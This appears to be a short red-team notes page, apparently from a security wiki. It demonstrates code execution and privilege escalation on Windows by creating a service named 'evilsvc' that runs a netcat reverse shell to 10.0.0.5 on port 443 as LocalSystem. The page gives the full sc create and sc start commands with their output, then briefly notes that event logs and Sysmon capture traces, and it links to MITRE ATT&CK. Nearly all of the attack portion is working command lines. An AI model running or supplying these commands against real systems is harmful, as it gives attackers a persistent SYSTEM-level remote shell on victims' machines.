| description |
|---|
Code Execution, Privilege Escalation |
Creating an evil service with a netcat reverse shell:
{% code title="attacker@victim" %}
C:\> sc create evilsvc binpath= "c:\tools\nc 10.0.0.5 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
[SC] CreateService SUCCESS
C:\> sc start evilsvc{% endcode %}
The reverse shell lives under services.exe as expected:
Windows security, application, Service Control Manager and sysmon logs provide some juicy details:
{% embed url="https://attack.mitre.org/wiki/Technique/T1035" %}